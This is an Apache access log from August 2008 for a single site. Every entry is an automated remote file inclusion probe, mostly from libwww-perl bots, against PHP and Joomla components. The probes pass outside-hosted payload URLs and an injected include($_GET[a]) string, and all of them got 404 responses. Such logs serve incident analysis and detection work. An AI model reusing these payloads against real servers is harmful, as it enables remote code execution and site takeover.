65.38.169.228 - - [27/Aug/2008:00:17:07 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:17:34 -0700] "GET /logs/administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
74.200.206.130 - - [27/Aug/2008:00:17:34 -0700] "GET /administrator/components/com_bbclone/lib/selectlang.php?BBC_LANGUAGE_PATH=http://leqhi.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:18:29 -0700] "GET /logs/access_080726.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
128.163.2.43 - - [27/Aug/2008:00:18:31 -0700] "GET /logs/access_080810.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.38.169.228 - - [27/Aug/2008:00:18:48 -0700] "GET /logs/access_080810.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
200.68.51.152 - - [27/Aug/2008:00:18:52 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
200.68.51.152 - - [27/Aug/2008:00:18:52 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
200.68.51.152 - - [27/Aug/2008:00:18:52 -0700] "GET /logs/access_080810.log//admin/business_inc/saveserver.php?thisdir=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:18:56 -0700] "GET /logs/access_080807.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:18:56 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:19:43 -0700] "GET /logs/access_080807.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:19:43 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:19:43 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
200.68.51.152 - - [27/Aug/2008:00:20:38 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
200.68.51.152 - - [27/Aug/2008:00:20:38 -0700] "GET /logs/access_080724.log//components/com_flyspray/startdown.php?file=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
200.68.51.152 - - [27/Aug/2008:00:20:38 -0700] "GET //components/com_flyspray/startdown.php?file=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
66.172.9.3 - - [27/Aug/2008:00:21:03 -0700] "GET /logs/access_080810.log//newspublish/include.php?path%5Bdocroot%5D=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:21:04 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
200.68.51.152 - - [27/Aug/2008:00:21:15 -0700] "GET /logs/access_080717.log//components/com_flyspray/startdown.php?file=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:21:28 -0700] "GET /logs/access_080724.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:21:28 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:21:47 -0700] "GET /logs/access_080714.log//squirrelcart/cart_content.php?cart_isp_root=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:21:47 -0700] "GET /logs/access_080714.log//squirrelcart/cart_content.php?cart_isp_root=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:21:47 -0700] "GET /logs/access_080714.log//squirrelcart/cart_content.php?cart_isp_root=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:21:50 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:21:50 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:21:50 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:21:52 -0700] "GET /logs/access_080724.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:21:52 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:21:52 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:21:52 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:21:52 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:21:52 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
66.172.9.3 - - [27/Aug/2008:00:21:55 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
66.172.9.3 - - [27/Aug/2008:00:21:58 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://vncownz.t35.com/scan/idr0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:22:15 -0700] "GET /logs/access_080803.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
91.200.212.3 - - [27/Aug/2008:00:22:17 -0700] "GET /logs/access_080810.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.oldfactorymall.com"
128.163.2.43 - - [27/Aug/2008:00:22:36 -0700] "GET /logs/access_080728.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
128.163.2.43 - - [27/Aug/2008:00:22:36 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
128.163.2.43 - - [27/Aug/2008:00:22:36 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:22:52 -0700] "GET /logs/access_080720.log/myevent.php?myevent_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:22:52 -0700] "GET /myevent.php?myevent_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:22:53 -0700] "GET /logs/myevent.php?myevent_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:22:54 -0700] "GET /logs/access_080804.log/myevent.php?myevent_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:23:10 -0700] "GET /logs/access_080803.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
128.163.2.43 - - [27/Aug/2008:00:23:49 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:23:51 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:24:22 -0700] "GET /myevent.php?myevent_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:24:27 -0700] "GET /logs/access_080720.log%20/myevent.php?myevent_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:24:34 -0700] "GET /logs/access.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:24:34 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:24:35 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "oldfactorymall.com"
128.163.2.43 - - [27/Aug/2008:00:24:47 -0700] "GET /logs/access_080722.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:25:28 -0700] "GET /logs/access_080720.log/myevent.php?myevent_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:25:28 -0700] "GET /myevent.php?myevent_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:25:29 -0700] "GET /logs/myevent.php?myevent_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:25:32 -0700] "GET /logs/access_080804.log/myevent.php?myevent_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:25:50 -0700] "GET /logs/access_080722.log//squirrelcart/cart_content.php?cart_isp_root=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:25:54 -0700] "GET /logs/access_080722.log//squirrelcart/cart_content.php?cart_isp_root=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
193.111.11.7 - - [27/Aug/2008:00:25:54 -0700] "GET /logs/access_080722.log//squirrelcart/cart_content.php?cart_isp_root=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:25:55 -0700] "GET /logs/access_080720.log/myevent.php?myevent_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:25:55 -0700] "GET /myevent.php?myevent_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:25:56 -0700] "GET /logs/myevent.php?myevent_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:26:01 -0700] "GET /logs/access_080720.log/myevent.php?myevent_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:26:02 -0700] "GET /myevent.php?myevent_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:26:02 -0700] "GET /logs/myevent.php?myevent_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:26:17 -0700] "GET /logs/access_080804.log/myevent.php?myevent_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
62.149.232.117 - - [27/Aug/2008:00:26:23 -0700] "GET /logs/access_080804.log/myevent.php?myevent_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:26:32 -0700] "GET ///components/com_hashcash/server.php?mosConfig_absolute_path=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:26:32 -0700] "GET /logs/access_080717.log///components/com_hashcash/server.php?mosConfig_absolute_path=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:26:35 -0700] "GET /logs///components/com_hashcash/server.php?mosConfig_absolute_path=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:26:49 -0700] "GET /logs/access_080726.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:26:49 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
65.182.187.86 - - [27/Aug/2008:00:26:49 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:27:18 -0700] "GET /logs/access_080805.log///components/com_hashcash/server.php?mosConfig_absolute_path=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
89.218.85.18 - - [27/Aug/2008:00:29:39 -0700] "GET /logs/access_080729.log//admin/classes/TplLoad.php?full_path_to_public_program=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
89.218.85.18 - - [27/Aug/2008:00:29:39 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
89.218.85.18 - - [27/Aug/2008:00:29:40 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
202.89.35.113 - - [27/Aug/2008:00:29:50 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
202.89.35.113 - - [27/Aug/2008:00:29:51 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
89.218.85.18 - - [27/Aug/2008:00:30:25 -0700] "GET /logs/access_080803.log//admin/classes/TplLoad.php?full_path_to_public_program=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:30:43 -0700] "GET /logs/access_080804.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:30:43 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
59.126.46.141 - - [27/Aug/2008:00:30:49 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
59.126.46.141 - - [27/Aug/2008:00:30:49 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
59.126.46.141 - - [27/Aug/2008:00:30:49 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://aceperform.siteburg.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
209.172.55.178 - - [27/Aug/2008:00:31:04 -0700] "GET /logs/netcat/htmledit//errors.php?DOCUMENT_ROOT=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
209.172.55.178 - - [27/Aug/2008:00:31:05 -0700] "GET /netcat/htmledit//errors.php?DOCUMENT_ROOT=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
80.74.146.175 - - [27/Aug/2008:00:31:36 -0700] "GET /logs//admin/frontpage_right.php?loadadminpage=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
80.74.146.175 - - [27/Aug/2008:00:31:36 -0700] "GET //admin/frontpage_right.php?loadadminpage=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
80.74.146.175 - - [27/Aug/2008:00:31:36 -0700] "GET /logs/access_080714.log//admin/frontpage_right.php?loadadminpage=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:31:50 -0700] "GET /logs/access_080804.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:31:50 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:31:50 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.18.170.161 - - [27/Aug/2008:00:32:28 -0700] "GET /logs/access_080712.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.18.170.161 - - [27/Aug/2008:00:32:28 -0700] "GET /logs/access.log//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.18.170.161 - - [27/Aug/2008:00:32:28 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.18.170.161 - - [27/Aug/2008:00:32:28 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
80.74.146.175 - - [27/Aug/2008:00:32:30 -0700] "GET /logs/access.log//admin/frontpage_right.php?loadadminpage=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
209.172.55.178 - - [27/Aug/2008:00:32:43 -0700] "GET /logs/netcat/htmledit//errors.php?DOCUMENT_ROOT=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
209.172.55.178 - - [27/Aug/2008:00:32:45 -0700] "GET /netcat/htmledit//errors.php?DOCUMENT_ROOT=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:33:09 -0700] "GET /logs/access_080803.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:33:09 -0700] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
218.38.18.28 - - [27/Aug/2008:00:33:13 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:33:16 -0700] "GET /logs/access_080718.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:33:16 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:33:17 -0700] "GET /logs/access_080710.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:33:33 -0700] "GET /logs/access_080718.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:33:33 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
74.55.136.66 - - [27/Aug/2008:00:33:33 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.oldfactorymall.com"
65.38.169.228 - - [27/Aug/2008:00:34:27 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.oldfactorymall.com"
